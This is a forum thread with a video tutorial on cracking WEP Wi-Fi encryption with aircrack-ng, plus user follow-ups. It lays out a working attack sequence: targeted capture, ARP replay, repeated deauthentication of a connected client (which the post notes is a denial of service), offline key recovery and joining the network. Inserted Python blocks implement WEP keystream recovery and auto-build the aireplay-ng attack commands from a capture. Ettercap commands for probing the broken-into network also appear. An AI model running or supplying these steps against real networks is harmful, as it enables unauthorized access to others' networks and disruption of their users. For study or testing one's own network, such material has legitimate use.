
Thread: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

  1. #1
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3129452
    Download video: http://www.mediafire.com/?f17myy9vdu4fxic
    What is this?
    Yet another video on "How to crack WEP".


    How does this work?
    ARP beacon is needed (depending on the attack method), so this can be re-injected back into the network. To get these packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).

    Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then it's just a question of waiting, then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)

    From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.


    What do I need?

    > Aircrack-ng suite
    > WiFi card that supports monitor mode & injection


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

    Commands:
    Code:
    # Tear down any stale monitor interface, then create one from wlan0 (mon0)
    airmon-ng stop mon0
    airmon-ng start wlan0
    # Capture only the target AP, locked to its channel; frames go to output-01.cap
    airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
    
    # Attack -3: wait for an ARP request from the client, then replay it so the AP answers with fresh IVs
    aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
    
    # Attack -0: deauth the client (10 bursts) so it reconnects and sends the ARP request -3 is waiting for
    aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
    
    # Offline key recovery from the captured IVs (re-run as more IVs arrive)
    aircrack-ng output*.cap
    
    # Join the network with the recovered 40-bit hex key and request a DHCP lease
    ifconfig wlan0 down
    iwconfig wlan0 essid g0tmi1k
    iwconfig wlan0 key 59EF19C76A
    ifconfig wlan0 up
    dhclient wlan0
    Notes:
    If you want WPA/WPA2 PSK (with a hidden SSID) - See: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html

    Song: Mr. Oizo - Flat Beat
    Video length: 03:50
    Capture length: 07:23

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/...th-client.html
    Forum Post: http://www.backtrack-linux.org/forum....html#post7957
    Last edited by g0tmi1k; 03-05-2011 at 02:51 PM.
    Have you...g0tmi1k?
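As an added example (not part of the original post and not code from the aircrack-ng suite), the Python below models the WEP encapsulation the post is attacking: the recovered key decrypts the captured frames, a wrong key fails the ICV check, and a frame whose first bytes are predictable (the LLC/SNAP header of an ARP request, which aireplay-ng picks out of the encrypted traffic by its fixed size) gives away the RC4 keystream for its IV, which then strips the first bytes off any other frame sent under the same IV without the key. The key is the hex key shown in the post; the IV, the ARP request and the IP packet are constructed for the demo. The statistical key recovery aircrack-ng runs over the collected IVs is not modelled here.

```python
import struct
import zlib
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 applied to data (XOR with the keystream, so encrypt and decrypt are the same)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for c in data:                             # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 over the plaintext, sent little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV(3) || key-id byte(1) || RC4(IV||key, plaintext || ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes; key must be 40-bit (5) or 104-bit (13)")
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Decrypt with the (recovered) key; None when the ICV fails (wrong key or corruption)."""
    iv, body = frame[:3], frame[4:]
    dec = rc4(iv + key, body)
    plaintext, tag = dec[:-4], dec[-4:]
    return plaintext if icv(plaintext) == tag else None


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Keystream bytes for this frame's IV, from a known plaintext prefix. No key needed."""
    return bytes(c ^ p for c, p in zip(frame[4:], known_plaintext))


def decrypt_prefix(frame: bytes, keystream: bytes) -> bytes:
    """Strip the first len(keystream) bytes of another frame that reuses the same IV."""
    return bytes(c ^ k for c, k in zip(frame[4:], keystream))


# Constructed values for the demo. KEY is the hex key the post recovers.
KEY = bytes.fromhex("59EF19C76A")
IV = bytes.fromhex("0c1a2b")
# LLC/SNAP header + ethertype: identical for every ARP (0x0806) / IPv4 (0x0800) frame,
# which is what makes it usable as known plaintext.
SNAP_ARP = bytes.fromhex("aaaa030000000806")
SNAP_IP = bytes.fromhex("aaaa030000000800")
ARP_REQUEST = SNAP_ARP + bytes.fromhex("0001080006040001") + bytes(20)   # ARP body zeroed
IP_PACKET = SNAP_IP + bytes.fromhex("4500001c00010000401100000a0000010a000002")


def demo() -> dict:
    arp_frame = wep_encrypt(KEY, IV, ARP_REQUEST)
    ip_frame = wep_encrypt(KEY, IV, IP_PACKET)     # same IV reused: the WEP design flaw
    ks = recover_keystream(arp_frame, SNAP_ARP)    # ARP header is the known plaintext
    return {
        "with_key": wep_decrypt(KEY, arp_frame),   # what the post does after aircrack-ng
        "wrong_key": wep_decrypt(b"\x00" * 5, arp_frame),
        "peek": decrypt_prefix(ip_frame, ks),      # first 8 bytes of the IP frame, keyless
    }


if __name__ == "__main__":
    r = demo()
    print(r["with_key"] == ARP_REQUEST, r["wrong_key"], r["peek"].hex())
```

The 24-bit IV is the weak point the replay attack leans on: every replayed ARP request makes the AP emit the same plaintext under a new IV, and with the IV space that small the statistical attack has enough material after tens of thousands of frames.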

  2. #2
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    1

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids?).


    Filter options:
    -b <bssid> MAC address of access point.
    -d <dmac> MAC address of destination.
    -s <smac> MAC address of source.

    Replay options:
    -a <bssid> Set Access Point MAC address.
    -c <dmac> Set destination MAC address.
    -h <smac> Set source MAC address.
    -e <essid>
    Fake Authentication attack: Set target SSID (see below). For SSID containing special characters, see http://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_single_quote_etc._in_ap_names

    Attack modes:
    -0 <count>, --deauth=<count>
    This attack sends deauthentication packets to one or more clients which are currently associated with a particular access point. Deauthenticating clients can be done for a number of reasons: Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is "cloaked" or Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate or Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected). Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.

    -3, --arpreplay
    The classic ARP request replay attack is the most effective way to generate new initialization vectors (IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IV. It is all these new IVs which allow you to determine the WEP key.
    One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c? Basically, what's the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?

  4. #4
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Hey great video. I'm completely a newbie but I stumbled across backtrack and have been looking into how it works and want to test the strength of my Wi-Fi password. (Mainly because I'm paranoid and every time my internet goes slow I assume someone has found a way in, sort of silly I know..but possible)

    Right now it's currently a WEP and I'm not going to change to a WPA until I can crack it. I followed your steps (which were very easy by the way) but then....

    When I got to the last step where you cracked the key I got

    "Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?

    I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.

    Edit:
    Sorry just a little extra information around 2:20 of the video when I'm looking at the packets sent in shell 2 is zero and I'm not sure why, is that important? the data is increasing in shell one though.

    Update:
    I finally got my own WEP code so I'm going to definitely upgrade to a WPA lol because it wasn't too hard. I am curious to find out why it was failing before though. This time I let the shell one run longer after the code

    airmon-ng start wlan0

    before using

    eg. airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

    would that have made a difference at all or is it just a big coincidence?
    Last edited by athemak; 05-12-2010 at 04:44 AM. Reason: more info and update

  5. #5
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Quote Originally Posted by overyander View Post
    Awesome video, thanks. So, suppose you've cracked a WEP and DHCP is disabled and you obviously need an IP and network setting to set for static. So what then? Thanks
    Well you can either try and guess what the IPs are (192.168.1.1, or 192.168.0.1 or 192.168.1.254 or google)
    OR
    There are a lot of ways to do it. For example you can use the ettercap plugin find_ip to find a free ip and the plugin gw_discover to find the gateway.
    To find the ip:
    ettercap -T -i interface_name -P find_ip //
    To discover the gateway:
    ettercap -T -i interface_name -P gw_discover
    Thanks petabyte
    Disabled DHCP! how to find out IP - Remote Exploit Forums

    mastodongle
    Here's a quick reference from the aireplay-ng manpage for all the flags used in this video with aireplay-ng, so you don't have to search up and down the actual manpage to see what they mean (maybe include these in popups for future vids? ).
    ...
    One question: why with the --arpreplay attack do you use -b (filter option, AP) with -h (replay option, source MAC) while with --deauth you use both replay options -a and -c ? Basically, whats the difference between the filter and replay options? I see that replay sets the addresses, but how do I know when to set vs. when to filter?
    It's an idea I have thought about doing, and one day I may end up doing it! anyway...
    Trial and error? arpreplay asks for -b and -h, deauth asks for -a -c.



    Quote Originally Posted by athemak View Post
    Hey great video. I'm completely a newbie but I stumbled across backtrack and have been looking into how it works and want to test the strength of my Wi-Fi password.
    ...
    "Failed. Next try with 30000 IVs" instead of the WEP key any ideas why?
    Yep. You haven't got enough of the "right" packets. You just need to collect more.

    I'm also not sure how to make it capture more IVs. I waited for time to pass and ran the aircrack command again but got the exact same message.
    Either wait for some activity OR generate some.
    Last edited by g0tmi1k; 05-14-2010 at 07:44 AM.

  6. #6
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    1

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    I don't get how you decide which BSSID/station to use?

  7. #7
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    Quote Originally Posted by Dandrama View Post
    I don't get how you decide which BSSID/station to use?
    g0tmi1k - is my network (so that is the ESSID).
    If you follow "g0tmi1k" across...it has "00:19:5B:E7:52:70" (as the BSSID)

    Then moving down (to the client area), you see that in the "BSSID" column, one of them is the same as the BSSID from above (00:19:5B:E7:52:70). Move across to "station" - there is the MAC address of the client (00:12:17:94:90:0D) which is connected to my network (g0tmi1k)

    This is what I'm doing at 0:24 - 0:57 in the video.
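Added example, not from the original thread and not code from aircrack-ng: a Python parser for the CSV file airodump-ng writes next to the .cap when run with --write (output-01.csv for the command in post #1). It does by lookup what post #7 does by eye: ESSID to BSSID and channel, then the stations whose BSSID column matches that access point, skipping the "(not associated)" rows that are only probing. It also reads the AP's "# IV" counter, which is the number aircrack-ng's "Failed. Next try with N IVs" message from post #4 is waiting to grow, and builds the two aireplay-ng lines from post #1 for the first associated client, refusing when the network is not WEP (the ARP replay attack does not apply to WPA). The sample file is constructed in the layout of airodump-ng's CSV output (column names as in that format); the BSSID, client MAC and ESSID are those from the post, everything else in it is made up.

```python
import csv
import io
from typing import Dict, List, Tuple

# Constructed sample in the layout airodump-ng writes for --write output (output-01.csv):
# an access-point table, a blank line, then a station table. BSSID, client MAC and ESSID
# are the ones from the post; timestamps, signal and packet counters are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:19:5B:E7:52:70, 2010-03-02 12:00:00, 2010-03-02 12:07:23,  8,  54, WEP , WEP, , -40,  120,  30000,   0.  0.  0.  0,   7, g0tmi1k, 
00:11:22:33:44:55, 2010-03-02 12:00:01, 2010-03-02 12:07:22, 11,  54, WPA2, CCMP, PSK, -65,   90,      0,   0.  0.  0.  0,   5, other, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:94:90:0D, 2010-03-02 12:00:05, 2010-03-02 12:07:20, -50,  2000, 00:19:5B:E7:52:70, g0tmi1k
AA:BB:CC:DD:EE:01, 2010-03-02 12:00:09, 2010-03-02 12:07:10, -70,     5, (not associated) , 
AA:BB:CC:DD:EE:02, 2010-03-02 12:01:00, 2010-03-02 12:06:00, -60,   300, 00:11:22:33:44:55, other
"""


def _table(block: str) -> List[Dict[str, str]]:
    """Parse one CSV table into dicts; airodump-ng pads fields with spaces, so strip them."""
    rows = list(csv.reader(io.StringIO(block)))
    header = [h.strip() for h in rows[0]]
    return [{k: v.strip() for k, v in zip(header, r)}
            for r in rows[1:] if any(f.strip() for f in r)]


def parse_airodump_csv(text: str) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
    """Split the file at the 'Station MAC' header into (access points, stations)."""
    split = text.index("Station MAC")
    return _table(text[:split].strip()), _table(text[split:].strip())


def pick_target(text: str, essid: str) -> Dict[str, object]:
    """ESSID -> BSSID, channel, encryption, IV count and associated clients.

    Find the ESSID in the top table, read its BSSID, then keep the stations in the
    bottom table whose BSSID column equals it. "(not associated)" rows are clients
    that are only probing; --arpreplay and --deauth need a real association.
    """
    aps, stations = parse_airodump_csv(text)
    ap = next((a for a in aps if a["ESSID"] == essid), None)
    if ap is None:
        raise LookupError(f"no access point with ESSID {essid!r} in the capture")
    bssid = ap["BSSID"]
    return {
        "bssid": bssid,
        "channel": int(ap["channel"]),
        "privacy": ap["Privacy"],
        "ivs": int(ap["# IV"]),
        "clients": [s["Station MAC"] for s in stations if s["BSSID"] == bssid],
    }


def aireplay_commands(target: Dict[str, object], essid: str, iface: str = "mon0") -> List[str]:
    """The two aireplay-ng lines from the post, filled in for the first associated client."""
    if target["privacy"] != "WEP":
        raise ValueError(f"{essid!r} uses {target['privacy']}; the ARP replay attack is WEP-only")
    if not target["clients"]:
        raise LookupError("no associated client; --deauth/--arpreplay need one to get an ARP request")
    bssid, client = target["bssid"], target["clients"][0]
    return [
        f"aireplay-ng --arpreplay -e {essid} -b {bssid} -h {client} {iface}",
        f"aireplay-ng --deauth 10 -a {bssid} -c {client} {iface}",
    ]


if __name__ == "__main__":
    t = pick_target(SAMPLE_CSV, "g0tmi1k")
    print(f"{t['bssid']} ch{t['channel']} {t['privacy']} ivs={t['ivs']} clients={t['clients']}")
    for line in aireplay_commands(t, "g0tmi1k"):
        print(line)
```

Point it at the real file with `pick_target(open("output-01.csv").read(), "g0tmi1k")`; re-reading it while airodump-ng runs is an easy way to watch the IV counter climb instead of re-running aircrack-ng blind.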

  8. #8
    Just burned his ISO
    Join Date
    May 2008
    Posts
    3

    Re: [Video] Cracking WiFi - WEP with a client (aircrack-ng)

    What does it mean when it says, "mon0 is on channel -1, but the AP uses channel 1"? How should I fix that? Thanks in advance.
